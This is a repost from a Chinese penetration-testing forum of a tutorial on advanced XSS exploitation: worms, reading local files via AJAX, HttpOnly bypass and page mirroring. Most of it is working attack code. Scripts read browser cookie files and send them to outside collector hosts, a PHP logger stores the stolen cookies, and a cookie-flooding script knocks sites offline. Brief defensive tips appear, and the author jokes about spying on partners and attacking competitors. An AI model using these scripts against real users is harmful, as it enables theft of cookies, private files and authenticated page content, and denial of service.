中国网络渗透测试联盟

标题: XSS的高级利用部分总结 -蠕虫 [打印本页]

---

作者: admin    时间: 2012-9-13 17:13
标题: XSS的高级利用部分总结 -蠕虫
XSS的高级利用部分总结 -蠕虫,HTTP-only,AJAX本地文件操作,镜象网页
本帖最后由 racle 于 2009-5-30 09:19 编辑

: f# P' ]8 }3 v: AXSS的高级利用总结 -蠕虫,HTTPONLY,AJAX本地文件操作,镜象网页
By racle@tian6.com   
) \9 o; B3 f1 R1 ehttp://bbs.tian6.com/thread-12711-1-1.html
转帖请保留版权
6 |6 x8 e& r: T4 s! L2 M; T7 t

% Q6 W4 l' a; k; c1 N$ O
-------------------------------------------前言---------------------------------------------------------


本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文.
( e* g4 D" d! I! J" j, L/ _+ _) Z6 X' y$ v
$ h* h9 I) }( {+ L/ ^
+ Q" ?( q0 r* {: N7 E如果你还未具备基础XSS知识,以下几个文章建议拜读:
' Y, ^' X0 c/ uhttp://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/        JavaScript中文简介
http://www.google.com/search?q=XSS+%D3%EF%BE%E4        XSS语句大全
http://www.google.com/search?q=XSS+%C8%C6%B9%FD        XSS语句绕过
) l- D0 r8 G7 B( l% m& {' C  Ghttp://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt        FLASH CSRF
; Z2 M, ]" o( h1 q# jhttp://bbs.tian6.com/thread-12239-1-1.html        突破XSS字符数量限制执行任意JS代码
. ?( I5 p% T4 W  ehttp://bbs.tian6.com/thread-12241-1-1.html        利用窗口引用漏洞和XSS漏洞实现浏览器劫持
% l8 I7 l1 r/ G, `/ A



如果本文内容在你眼里显得非常陌生,或者难以理解,或者干燥无味,那正代表你对XSS了解甚少.
6 D" E; J4 m4 F2 s( S4 L0 w2 d
5 K: ^7 A' [3 i- ?1 s2 X希望天阳会员本着技术学习为主的精神,真正的学习和掌握每门安全技术.因此,如果你来天阳是因为你想真正学会一些什么东西的话,请静下心来,看懂,看透,实际测试弄通本文.那么你对XSS的驾驭能力,自然大幅提高.

8 G& \% p6 @, t0 k* d/ I9 W" r如果你认为XSS是无足轻重的问题,只不过是常见的一个弹窗,或者你认为XSS作用域狭窄,或者你认为XSS威力微不足道,那么请先看看以下片段:Twitter遭遇疯狂XSS    6次XSS蠕虫版本变化,

Baidu xss蠕虫         感染了8700多个blog.媒体影响力,关注度巨大
: B. ?- u: Z$ l" Z0 b
" V: T5 q7 m/ |8 jQQ ZONE,校内网XSS     感染过万QQ ZONE.

* W9 a5 j0 [6 x8 g$ zOWASP MYSPACE XSS蠕虫        20小时内传染一百万用户,最后导致MySpace瘫痪
+ F* T9 p8 U8 K- x$ K+ R
..........
复制代码------------------------------------------介绍-------------------------------------------------------------

# ^8 {/ m3 j7 Q( g) w7 C' W5 E$ }什么是XSS?XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的.XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性.


! N' b( B+ w! o- M- ~7 j! U
跨站攻击有多种方式,由HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息（Cookie）,由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失.当然,攻击者有时也会在网页中加入一些以.JS 或.VBS为后尾名的代码时,在我们浏览时,同样我们也会被攻击到.

, m/ L/ V$ A& x* g! G! H. [$ o7 L
4 X% T% w& \" \) q( v
如何寻找,如何绕过各种限制,成功无错的执行XSS代码,我们在这里并不讨论.相关的文章在网上也有很多.
6 z. v$ r. \. x% M6 l复制代码现今XSS替代了SQL-INJECTION,成为web security课题的首位安全问题.XSS已经成为WEB安全的重要课题.
4 b8 y, `, e3 [我们在这里重点探讨以下几个问题:

1        通过XSS,我们能实现什么?
+ @% ?6 e, _) S1 U" `$ |
+ r9 V" I" N" S: Y) U- G0 r2        如何通过HTTP-only保护COOKIES. 又如何突破HTTP-only,又如何补救?

3        XSS的高级利用和高级综合型XSS蠕虫的可行性?

$ Z1 V4 y: O( E, N8 a& \4 Y4 s8 _3 o, d4        XSS漏洞在输出和输入两个方面怎么才能避免.
6 q# T+ B0 M6 v+ G7 l" Z2 t: W. L$ P
# I0 f, k9 |$ n/ E$ [# g( o. B+ H
2 j/ m) S0 C+ l3 v
: O' S) R& o3 H: q$ H------------------------------------------研究正题----------------------------------------------------------
/ e: `& G8 a9 [
/ V8 M1 Q- y0 ~  ]5 M

  h) y4 K- b1 H5 k5 H通过XSS,我们能实现什么?通过XSS,我们可以获得用户的COOKIES等信息,模拟用户本身进行HTTP提交,读取客户端本地文件,欺骗社工.结合以上功能,我们还能写出综合高级蠕虫.
复制代码XSS的高级利用与及综合性XSS高级蠕虫:我们主要讨论XSS在不同的浏览器下的权限限制&&XSS截屏;镜象网页,http only bypass(Cross-Site Tracing XST).写出我们自己的高级XSS蠕虫
6 `5 K4 f% E% d7 l复制代码XSS漏洞在输出和输入两个方面怎么才能避免.
1:为网站各个动态页面分安全等级,划分重点和次重点区域,分等级采用不同的输入限制规则.
2:严格控制输入类型,根据实际需求选用数字,字符,特殊格式的限制.
3:在浏览器端输出时对HTML特殊字符进行了转义,常见采用htmlspecialchars,htmlentities.但是过滤了特殊字符,并不意味就是安全的.很多绕过方法都是争对单纯过滤进行的,譬如URL,8进制,16进制,String.fromCharCode转编码,UBB绕过等.因此应注意每处接受动态输入的代码审计.数据保存在innertxt,标签属性均应处于“”内.
* I2 m* Z# a& G* C- z9 V4:Http-only可以采用作为COOKIES保护方式之一.
0 p  s. m* m5 A
. c0 [" _8 _' z8 t* H* d

  e8 [0 o& u4 d5 N2 Q2 b1 J

' ?6 f+ d' ~7 o  Z(I) AJAX在不同的浏览器下的本地文件操作权限读取本地的COOKIES,常见的敏感文件如:FTP的INI,etc/shadow,各种第三方应用程序的敏感文件等,并且将内容反馈给攻击者)
2 _+ a' i( r& b  }( u* K# J) W; p6 C
* k5 |/ {( x" S) N( ?" [我们可以参考空虚浪子心的两篇文章,与及XEYE TEAM的统计信息:    1: ie6可读取无限制本地文件.ie8以及相应版本的trident内核浏览器对ajax本地执行时的权限控制得很死的，看来MS对IE这类安全风险比较重视。(这有一些问题，随后修正!)


9 R" D4 @, u* Z0 x
    2: ff 3.0.8及以下版本允许本地执行的ajax访问当前目录下的文件内容。其他目录暂无法访问。
/ N* p& j; a# Y+ C; y% ~% E+ ^! v
) x% F9 Z0 U$ d& g3 `0 p% ~2 `

    3: opera9.64及以下版本允许通过指定url为file://协议进行访问；如果文件在当前目录下，则不需要指定file://协议；如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。
7 [% K% ^$ N: [5 G/ `
( E7 t6 v- l$ k2 K/ i$ \% |. y
/ D% x9 T" l; b4 u1 K
" v/ x: n& ^9 o$ R    4: 基于webkit内核：google chrome、遨游3.0、safari等浏览器对本地执行的ajax权限没做任何访问限制.
复制代码IE6使用ajax读取本地文件    <script>
" G2 e* d7 V6 w: u
    function $(x){return document.getElementById(x)}
0 o( ~' }1 g- c9 W% {: w3 |" q$ y
* {7 N; O6 G  ?. n9 n4 V

    function ajax_obj(){

    var request = false;

/ p% L( T4 I9 S9 {    if(window.XMLHttpRequest) {
" l$ r% o5 Y: B2 t  j& h  s
- M% ^, M  ~9 j- O    request = new XMLHttpRequest();

    } else if(window.ActiveXObject) {
! x: S, O' Y) p
- a. @2 o# I/ H* J2 z* k7 X$ `, C: H6 g* a    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
; N* s$ X5 e' q% t
1 B9 a" J  K, g

  s* o, t' U/ l& p- ?    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

, B6 {/ a7 |9 a; w    for(var i=0; i<versions.length; i++) {
. i% q" s, ^' B/ Q- u. C) }- m
    try {

    request = new ActiveXObject(versions);
1 E' L8 c# [& H6 Y# a5 K! u$ [5 B
    } catch(e) {}

    }
0 r' n1 Q9 w( @( o
    }
$ W3 C7 o6 p- a; {- ^* V' g
3 B% O8 q1 t  d0 e' V7 g    return request;

2 Z+ n% i' L! c+ O- r, p# c    }

    var _x = ajax_obj();
5 K; S0 R! }  `( [* `5 w
    function _7or3(_m,action,argv){
5 i0 G7 H3 N( [  J1 |& @  r( S
4 n/ k4 T, [: x, l$ A5 F- R$ P' J    _x.open(_m,action,false);
" I, R, P& ]$ r% V9 i, K
- `/ I2 s4 a  K  Z! o( A% u    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

: Q; h4 s% W8 s/ L1 i0 }' M. V' z    _x.send(argv);

    return _x.responseText;
6 z- t* ]6 s8 H; g- S' e* i7 w
8 _( E( x, x5 R7 s# I$ {    }
& ?% c0 f3 l2 E" m- d  [
0 M8 a1 g% Y' U1 X5 a) g- }1 s
' f( C/ T/ g3 m' R8 K- m7 K
7 @! }6 G3 R7 B6 k% m) J    var txt=_7or3("GET","file://localhost/C:/11.txt",null);

7 a5 D0 @5 B3 I7 h( G    alert(txt);
1 u& ?' `( w' b% j# J  O% e4 W) e" B: X
9 k$ _5 I' _. U  A  w

    </script>
复制代码FIREFOX 3使用ajax读取本地文件,仅能读取同目录,及其下属目录下文件.    <script>
$ J8 H( Z, I2 A7 t) @
6 ^3 r  Z# p2 D: l    function $(x){return document.getElementById(x)}
: F" S- }- B7 H$ ]2 [
1 k9 y' O4 y3 [# P1 ]

    function ajax_obj(){
7 i: d' R2 T9 C1 l6 ?
$ g  t% t4 k. N4 E" q6 |: P    var request = false;

' Y: T" Y# H4 o' G6 a    if(window.XMLHttpRequest) {
/ Y+ |" k/ K/ ^
' ], ~+ r! f+ X( j" c* d2 U9 X    request = new XMLHttpRequest();
! i) _+ g- B/ J0 z2 x
9 D7 Z" d7 N$ `7 r7 d# ^$ p: P/ {9 ?    } else if(window.ActiveXObject) {

    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',



    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

    for(var i=0; i<versions.length; i++) {
+ R" N) q! u& p, Q: C/ H+ s; g2 U
( f. H: ], E3 W  s1 u* {    try {
. ]; t8 p7 _, n& l$ G1 [4 j
    request = new ActiveXObject(versions);

    } catch(e) {}
$ h& q8 o3 d4 j" b0 g4 R: M% r
# g# Q" z" e6 l2 ?    }
  a) P2 b$ `5 ^1 Q/ Z0 Q
2 n% s4 {+ ?5 G    }

3 S# u/ t( n/ J5 g8 u9 ~* C    return request;

    }
6 W, T9 q1 w& C: K5 M
2 `0 a: D. U9 g% H; m8 H    var _x = ajax_obj();
7 @: p: _' T$ M$ p
    function _7or3(_m,action,argv){
, T/ l# P; l8 V( D3 L
    _x.open(_m,action,false);

9 {& g" k2 n$ a4 J# q    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
; g- _8 I4 f# k0 o
    _x.send(argv);
& S$ P1 Y% v0 K3 _/ B  z" ]
    return _x.responseText;

7 y5 v4 z# S6 I$ u9 e% [6 [    }

2 m. g8 W- e" R7 {6 N5 h: a0 ^3 \
' l6 C/ G' ?+ q+ n
* N: L# [7 H  S3 {    var txt=_7or3("GET","1/11.txt",null);

    alert(txt);

. |: X: j  Q  B& {5 K  n

    </script>
复制代码Google Chrome使用ajax读取本地文件Chrome的cookie默认保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”


# W9 }5 A0 F* `- P& K
Chrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"


8 \$ e9 u) l: Q6 I0 A: p: [5 z
5 I, v( D9 S  S: I+ v; m<?   

/*  
( i0 Z: @4 e2 z( q$ p# p* X( G4 f
     Chrome 1.0.154.53 use ajax read local txt file and upload exp  
5 I; O6 j( F- s* s+ \0 v9 ]
0 [6 k3 t7 @+ u- z: d: f% B& y     www.inbreak.net   

     author voidloafer@gmail.com 2009-4-22   
( X5 @) J8 i5 h4 B# X7 ]
     http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save.  

*/  

* D# U# ?) J7 a6 `header("Content-Disposition: attachment;filename=kxlzx.htm");   
/ i, p- j1 _) ]
4 ~7 w  n) f$ o. uheader("Content-type: application/kxlzx");   
  ~9 W( k2 H$ Z4 U/ h6 b' ~3 a# u
6 _0 ~& t# j4 ?: n- `/*  

     set header, so just download html file,and open it at local.  
/ a$ g. H* [) w; t  W. ?+ ]
*/  
( Y5 k8 Y0 u; u! V5 F
4 C7 O) S9 p* u- K: N?>   

" d9 `4 L: k# g; e+ f, M% T' b<form id="form" action="http://www.inbreak.net/kxlzxtest/testxss/a.php" method="OST">   
  _; x. Y. L: C# Y+ h
     <input id="input" name="cookie" value="" type="hidden">   

& R# f- j, S0 k, J</form>   
- }+ q0 q0 F) {2 y+ ^/ i+ q
<script>   

function doMyAjax(user)   
" J5 Q1 W2 P, F4 T  I% o5 R- y- D
2 n) W% x& ~8 {* O{   

var time = Math.random();   

/*  

the cookie at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default  

and the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History  
6 A8 g* @5 F' C% A& r$ i) L- C
. |5 R/ D3 g9 Eand so on...  
2 U" s  l+ G4 Z2 M5 _+ ^
*/  
; \7 x4 C0 d2 V# w+ @
! z3 K( k5 W2 Y$ h7 ?2 O" Dvar strPer = 'file://localhost/C:/Documents and Settings/'+user+'/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies?time='+time;   
# T. E1 }. I. S* {* b/ l
   

startRequest(strPer);   



}   
, ^* {5 v5 K0 @9 K
4 p4 d0 M: E8 h: h. a" g   

0 j3 [6 W( G/ z- |' i9 C7 wfunction Enshellcode(txt)   
+ \# [# _  l: @, ]
% L+ K5 s7 r( U{   

var url=new String(txt);   

8 \# T6 T, c' P" Qvar i=0,l=0,k=0,curl="";   

$ z) H" U& ]7 R# B' pl= url.length;   

for(;i<l;i++){   

k=url.charCodeAt(i);   

3 E9 E. i( T* t* l: c* Wif(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}   

if (l%2){curl+="00";}else{curl+="0000";}   
2 `" _9 c; K7 |
% T& U! p9 t2 e* j) K+ t2 u- pcurl=curl.replace(/(..)(..)/g,"%u$2$1");   
5 A* E- ~+ C8 r
6 C9 G# x  y6 `3 o) `4 {7 v( Rreturn curl;   
+ @3 V" e6 R" @+ z3 V! c$ \
" O( N3 k1 F, |' ?7 j}   

   
5 x/ e: ~. P7 c6 i3 b
   

var xmlHttp;   
2 a$ q: L4 A, J+ k) G9 d: {5 w
function createXMLHttp(){   

0 x6 L. ?: G( n5 ]     if(window.XMLHttpRequest){   
1 Y3 j; }7 X7 X- l/ U. [
xmlHttp = new XMLHttpRequest();           

5 M5 C* i/ H' a6 N7 d     }   

     else if(window.ActiveXObject){   
( `1 Z# A2 H: z
# Q- U0 B" |& u* }xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   

8 f* |9 Y9 G7 M3 r, ~* N1 h     }   

}   
6 h5 B1 u  O; w
; v4 f3 C# _! ]/ F9 t$ c   

function startRequest(doUrl){   
4 ]' Z2 G. C/ s9 I
% d9 W0 v/ p& R4 i$ A   
* H) s6 H, L3 p# N, n
     createXMLHttp();   
& y7 `( M& C' O' S; p8 m
, {" G$ T% D5 c$ f
" e: B. `4 E9 x# w0 N& k6 k
' d. m2 s6 o% \  D8 K2 t9 J# s' U% ]     xmlHttp.onreadystatechange = handleStateChange;   


& z, _) c. q( z$ R8 E! h# G1 C9 N
     xmlHttp.open("GET", doUrl, true);   
/ q! m7 @% k6 }+ w1 N
' q6 I. L( z- ?

& d+ i: l' ^. o: j- y. O) ~     xmlHttp.send(null);   


$ B4 M; s- ~, O- i+ Y
5 b5 j! v0 {9 E
% U0 P4 c# w$ d' j
}   

   

9 |$ Q' {7 x- S: y/ I1 [0 xfunction handleStateChange(){   

     if (xmlHttp.readyState == 4 ){   
* k9 e+ K! f. M- u; p8 A
     var strResponse = "";   
' @) {% O- d/ M0 r& X
8 q& i2 B- X6 y1 [9 V6 y/ {     setTimeout("framekxlzxPost(xmlHttp.responseText)", 3000);   
0 r2 f7 ~- J6 `5 \* A
        

9 n( E  k5 x7 G8 ~, K+ J4 p     }   
$ ?( Z8 V" S4 x* G- V' Q4 w* F, s
6 h; ]/ n* @9 l; K1 Y5 f7 h( L}   

   
& _  D; |! K% ?2 Z# T
   
7 k9 }1 E' u1 `; B  l
function framekxlzxPost(text)   
9 o& I9 c1 `, q' B* o" B; e
8 t' u9 Q7 Y0 D, _* W# X{   

. z! \4 r5 Z2 k/ j% O; P     document.getElementById("input").value = Enshellcode(text);   
5 ^/ y+ y( q8 v. u$ u
     document.getElementById("form").submit();   

}   

- I% G7 R5 e; R; b) A   

, \+ t. I& U  X3 C% @5 I9 @$ n# WdoMyAjax("administrator");   

$ ]" }: B+ _, h   
2 K4 ]; h8 @* L$ s( ]) l
1 ^# ?: B9 e' Z- ]</script>
1 N( t* Z7 O9 L& E# D6 r复制代码opera 9.52使用ajax读取本地COOKIES文件<script>  
# j1 J5 T- I. a7 M- z2 z
5 c- l- H( u& _4 d2 Ivar xmlHttp;  
* P. [$ M' j( u8 N, L6 Y; E" \
. [. I6 ^9 j1 E  g  Dfunction createXMLHttp(){  

% O2 x* Z9 j, q* A4 n     if(window.XMLHttpRequest){  
3 u" j7 B1 ]* s6 d" C
         xmlHttp = new XMLHttpRequest();         

# g* C, r" [7 n% Q, r0 W     }  

     else if(window.ActiveXObject){  

         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  

1 M3 g- L' w* Y/ T1 h     }  

( }2 s% z# i* ~( b, U* G1 z}  
$ V# e9 ^# N' K7 X1 \3 |" y  g
, K) L( P( T( O   

function startRequest(doUrl){  
' J  H7 k" o( z& g; q& p0 B
5 R' U: q; |( ]3 l           

3 _/ u+ o( v- S     createXMLHttp();  
9 `. [9 k: a9 \7 |3 }7 ?# z
      
3 \% ]6 r. y  G/ z2 O+ P1 M9 b
     xmlHttp.onreadystatechange = handleStateChange;  

      

     xmlHttp.open("GET", doUrl, true);  
7 M3 K) c) J) y, W/ R0 s: R
      

( ?7 w. Y9 u  u     xmlHttp.send(null);  
' i5 X) H2 L" L/ V/ |+ f( Q
      

      
5 ^5 V- h8 p$ B+ K" H) h
}   
& ^, d& R5 \  ?4 y2 X
   
& `8 B& ?2 {2 Z2 j6 z
! a7 r4 h1 F+ R, N0 efunction handleStateChange(){  

     if (xmlHttp.readyState == 4 ){  
9 J" f: k( d) i$ a" t# \% `
- e3 v5 z+ a* ~5 A% _             var strResponse = "";  
8 X6 k: Y3 I8 e. w+ z
             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   

               

     }  
+ s' X# j7 e+ `! u+ ^
}  
% @! O! J5 H$ z. ]# V/ Z
# J" d" |, R6 d  l6 `- Q   
' |1 {  A( h5 h3 U  Q
function doMyAjax(user,file)  
. T# w+ d/ g3 `  o; h: L
{  

         var time = Math.random();  
7 T' `. |, }/ R; S0 P! P
% K+ Y  Z( Z" H/ ?1 Y) n           
$ k0 O  L, x, Q, d6 A! a6 ^
         var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;  

           

         startRequest(strPer);  

1 `) d. w8 _" ^8 S: b' n" c      
2 H4 C& _$ R9 N, r  w# \! N1 J
}  
  s1 e# G4 a9 S
9 }4 Z: {9 o. {2 i/ E3 e* {   
4 \9 ~, m, N8 ^- ?
function framekxlzxPost(text)  
( Z' _' v: c0 K1 z* O
- U' z# S; Z/ t7 {) Y9 }{  
- d; |8 K! v5 h, P( i5 L
     document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);  

, V: p( r+ v$ [     alert(/ok/);  
- h# ~; P% r" a; v6 C& r
}  

. h% W6 T$ f+ }( O+ i   

doMyAjax('administrator','administrator@alibaba[1].txt');  

   

</script>
  M5 U6 |: ~9 ~
; r+ ~8 v7 `. [$ ]% o+ J
  C4 f6 I9 C" j- _

0 }) G0 [- H4 X( o! \
2 R. J* z4 l3 Z) la.php

! p; w, ^+ s8 M( \

<?php      
; F; N/ @/ @( [2 j. s. R
   

$user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  

' g3 u' ~: Y' \; e5 N! C$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];   

  
: e- h' p) i1 B2 n
, h  z, Y4 Q% ?1 q# C- O! o$fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");     

9 j. V7 B0 a, {- z" J4 b! j2 rfwrite($fp,$_GET["cookie"]);      

fclose($fp);   
, C5 x- ~  u" h) u' @$ V3 {
?>
$ W, b+ r% ?7 N( W+ B) N6 R复制代码(II) XSS截屏-镜象网页与XSS实现DDOS:

或许你对你女朋友的校内网里的好友列表感兴趣,又或者你对你的客户部竞争对手的电话通信记录感兴趣,那么这个由XEYE TEAM提出的新想法,对你就有用.
* a0 {) k, D! E1 ^利用XSS获得指定的受控者授权状态下的页面源代码,再传发到目标页面,处理好相对路径,那么攻击者就能截取任意一个受控端的授权状态下的镜象网页.达到类似远程控制程序截屏的功能.
9 d1 I- l) N, V, ?/ C
代码片段://xmlHttpReq.open("GET","AWebSiteWhichYouNeedToCatch.com",false);

//xmlHttpReq.open("GET","http://friend.xiaonei.com/myfriendlistx.do",false);
- V/ l, Y: T1 r1 a+ T8 W6 ?
//xmlHttpReq.open("GET","http://chinatelecom.com/mylistofnopermonth.jsp?no=139xxxxxxxx",false);

% E6 B' t. H' h) y+ yfunction getURL(s) {
8 o4 j: K0 y8 ^! P# h$ J
var image = new Image();

image.style.width = 0;

! }3 Q( `, k0 {. W2 Zimage.style.height = 0;
; N9 O4 S& R$ l4 C5 M3 t
) [5 R  U: O3 e5 e- _$ X. }image.src = s;

' L, e8 y4 h& ^, l% m# B}

getURL("http://urwebsite.com/get.php?pagescopies="+xmlHttpReq.responseText);
复制代码XSS也能大材小用DDOS? 利用XSS操作COOKIES,导致HEADER部分过大,引发IIS或APACHE等服务端CRASH或者拒绝响应.生效时长与COOKIES允许保存时间相等.
这里引用大风的一段简单代码:<script language="javascript">

var metastr = "AAAAAAAAAA"; // 10 A
4 u( |# E- [& E: W# v; k
var str = "";
, I- S8 ~3 ]) U5 h, m& A
+ L  Q1 P: X5 ~/ b, J6 }1 W1 }while (str.length < 4000){

    str += metastr;

3 _9 I8 L+ A# L) G}
2 E, l) [) W; b1 C$ L# ~

- O& M; I! E, U8 O  F
document.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";    // 一些老版本的webserver可能在这里还会存在XSS
, V. G3 l" ~: ^2 U$ R
  G2 }% o2 H  Y$ g</script>
5 z2 P. u/ c" N  g3 [$ e
# n! {1 q9 f, r" h( F- E详细代码请看:http://hi.baidu.com/aullik5/blog ... aeaac0a7866913.html
复制代码如果你觉得XSS用来DDOS太可惜的话,这里也提供另外一篇文章供你参考,随与XSS无关,但是却也挺有意思.
server limit ddos利用随想 - 空虚浪子心 http://www.inbreak.net/?action=show&id=150

假设msn.com出现了问题,被XSS了.并且攻击者把COOKIES 设置成yahoo.com的.那么所有访问msn.com的用户将无法访问yahoo.com.
  H- r) a2 A& F0 Y& X* B攻击者在自己的网站上iframe了server limit ddos,目标设置为竞争对手myass.com,那么所有访问过攻击者网站的人,将无法访问其同行竞争对手myass.com的网站,这样不很妙么?呵呵.
) n! G6 ]6 ~' y* @: o# q




% j. X9 u- N7 N) ^' ?
(III) Http only bypass 与 补救对策:
* s0 f. ^, t# L/ Y& b  i0 F
什么是HTTP-ONLY?HTTP-ONLY为Cookie提供了一个新属性，用以阻止客户端脚本访问Cookie.
: t* K& b0 \7 r# A以下是测试采用HTTPONLY与不采用时,遭受XSS时,COOKIES的保护差别。<script type="text/javascript">

' p/ p) }& u2 u, L1 J. F<!--

  b$ I# T1 ~5 v+ {8 C2 Nfunction normalCookie() {
% `0 {0 K$ T+ {  H3 f/ K
+ C4 M; r4 I4 ?document.cookie = "TheCookieName=CookieValue_httpOnly";

alert(document.cookie);
: l8 d) v1 N0 H/ V4 g
}
$ Y+ d4 k* B; H" ^7 w  q& ?


8 A3 b$ v0 v: U* s. P9 q

' v; H$ A2 B" D" Ffunction httpOnlyCookie() {

document.cookie = "TheCookieName=CookieValue_httpOnly; httpOnly";
3 z" \  m6 J3 c8 g3 q3 d0 G, R
alert(document.cookie);}
3 P) H" d# Q0 u! A/ b$ L

4 G# O$ d. }+ I. D9 P8 v4 \5 B: M" |* l9 w1 V
//-->

9 F4 k0 @  }- \9 w/ p</script>

7 F% \0 i, X% `: F& b2 \+ r

/ S9 e# D% O$ `6 V, C4 F<FORM><INPUT TYPE=BUTTON OnClick="normalCookie();" VALUE='Display Normal Cookie'>

<INPUT TYPE=BUTTON OnClick="httpOnlyCookie();" VALUE='Display HTTPONLY Cookie'></FORM>
复制代码但是采用HTPPONLY就安全了吗?不一定.采用TRACE获得HEADER里的COOKIES:<script>
0 e2 w$ p7 \+ K+ P1 ]

  h" F$ O$ s+ C& b4 J& R
7 G# E3 q% ?8 j  L' _3 ivar request = false;

        if(window.XMLHttpRequest) {

& T) e7 v6 A0 F2 d1 i# b            request = new XMLHttpRequest();
# {5 k+ ?  @7 }
            if(request.overrideMimeType) {

                request.overrideMimeType('text/xml');
8 y/ R' W+ ~3 Y7 z
2 F! p! p1 [% u            }
% V3 a* |  W1 @- f& Z) M  L
. I$ o: m0 X: _3 W        } else if(window.ActiveXObject) {
* N5 Z& P; K7 Y; J6 R9 O6 y
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

            for(var i=0; i<versions.length; i++) {
/ e! e1 h! x: B* j$ D( t# C
& p$ s& q& M% f3 N                try {

                    request = new ActiveXObject(versions);

8 o  U# ~! A9 S5 Q  x) F, B* k                } catch(e) {}

4 f4 e# Z3 U; \. m- P            }
9 c# C% I7 d  q( W. d- l
9 T1 f% i. e, V! U9 I6 B; L) w3 a1 j        }
2 `% ~9 }. P2 f( C; y$ W- v
xmlHttp=request;

  o1 C" j, ?9 ^6 r0 z# L5 kxmlHttp.open("TRACE","http://www.vul.com",false);

xmlHttp.send(null);

+ n8 l- u/ T5 ?6 E) i0 qxmlDoc=xmlHttp.responseText;
$ U6 Y/ T2 q; X$ T2 g* R! U
6 b: X1 i: K; P; w2 b7 Oalert(xmlDoc);
; Y; C; u# V! P6 M7 @6 d
: Z8 ^8 E& b* {</script>
  O: F9 A/ c- T, n4 ?3 d# E, o复制代码但是许多网站并不支持TRACE调试命令,那么我们还可以通过访问phpinfo();页面,筛选带有COOKIE的字段值.<script>
. x& X/ s* P, }' N, L! i% \
' X# [: {1 j  T  E0 M  J# yvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
3 {. {0 [+ p  J
XmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");
1 }' K$ C; O9 p  f" X/ V
XmlHttp.send(null);

/ M# @# B0 g5 ?8 z% pvar resource=xmlHttp.responseText

8 }6 F9 T" Z! L# z. A: r* Presource.search(/cookies/);
) R- E! ], S, U% J8 D5 Q
......................
1 k" W6 I7 Z; C6 Z. n) R* T
</script>


; ^& C( E3 ]' m+ J  u  ^, Y

, k0 Q2 V/ Y$ j4 L& |: A- r
如何防止对方采用TRACE访问你的网站?APACHE可以采用.htaccess来Rewrite TRACE请求
( L/ [, n+ a) s! Y
[code]

; {! A) \9 Z6 x; `" c) w4 I# K7 A2 ?RewriteEngine On
- K) M# n# l% y( X& s( B6 x
, j( a5 e# f! `8 ?' i5 j* ?RewriteCond %{REQUEST_METHOD} ^TRACE
! {! S7 i6 |3 \6 {/ G9 F( u8 [
! ^- q/ B+ {( mRewriteRule .* - [F]


; e# e# x1 ?/ `- ?$ e2 V7 c  i: ^
Squid可以添加以下信息到Squid configuration file (squid.conf),屏蔽TRACE请求

' `- m; k2 C* q. l2 `; R* xacl TRACE method TRACE

...

$ b$ J1 i2 d4 l, Ahttp_access deny TRACE
' w  ^# M- Q8 d/ E! I0 ?( p复制代码突破还可以采用XmlHttp.setRequestHeader.通过setRequestHeader,把COOKIES等信息转向到目标页面.<script>
8 W2 x0 u9 w/ [( E, Z! j
var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

/ d* r/ N" x, k) q9 T. q' \. xXmlHttp.open("GET","http://www.google.com",false);

6 G" b& u% l4 U* d" u1 {XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");
4 Y+ S: y7 M% ^' m
XmlHttp.send(null);

